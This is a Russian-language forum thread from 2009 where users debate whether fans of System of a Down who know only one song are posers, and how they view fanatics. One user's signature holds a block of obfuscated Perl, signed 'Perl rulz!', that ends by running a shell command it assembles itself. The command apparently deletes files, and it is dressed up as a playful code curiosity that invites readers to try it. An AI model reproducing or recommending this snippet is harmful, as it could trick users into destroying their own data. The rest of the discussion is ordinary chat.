ну понеслось вечные разборки кто труЪ металлисты а кто гавно позерное... бесит эта тема.
я благодарна этой песне хотя бы за то, что когда говоришь "я слушаю SOAD" можно было включить именно эту песню и продемонстрировать что такое эти загадочные систем оф э даун, потому что эту песню знают практически все... а про другие, как собсна и группу, не хрена не слышали
да такие у меня друзья пля
я благодарна этой песне хотя бы за то, что когда говоришь "я слушаю SOAD" можно было включить именно эту песню и продемонстрировать что такое эти загадочные систем оф э даун
мне кажется Лонли Дей еще попсовее _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
Добавлено: Пт Июл 24, 2009 9:08 am Заголовок сообщения:
choco
речь шла не о том, кто тру, а кто, как ты выражаешься, гавно позерное. Я имела в виду совсем другое - есть люди, которые начинают утверждать, будто хорошо знакомы с творчеством SOAD, прослушав пару раз одну единственную песню. Я блин не говорю ведь - если ты услышал Chop Suey, обязательно прослушай ВСЕ трэки, а то покарают тебя силы небесные и превратишься ты в гавно позерное _________________ Il nous reste toute une vie pour pleurer
ALuserX
Кстати, а как ты относишься к фанатам, коим сам не являешься, (или же хочешь так считать и чтоб другие так считали) _________________ don't ask me how...
Lastly
я верю в тонкую грань между фанатом и человеком который знает о группе почти все) а проходит она так, где начинается "фанатичность") думаю примеров приводить не нужно, хотя могу и привести)
а к фанатам чего-либо я отношусь прежде всего как к источнику лулзов) это не значит, что я за людей их не считаю, или за дураков держу (хотя, если честно, немного, по определению любой фанатизм, будь то музыкальный, политический или религиозный, - глуп) а, если у меня среди друзей/знакомых есть фанаты чего-либо, я стараюсь эту тему обходить стороной, особенно если я противоположного мнения, чтобы не ссориться, как например я поссорился некогда с нэнси _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Ср Окт 28, 2009 12:02 am Заголовок сообщения:
ALuserX писал(а):
грань между фанатом и человеком который знает о группе почти все
Вопрос такой.Если мне нравится музыка,нужно ли мне знать о группе вообще хоть что-то?Потому что я считаю,что нет. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.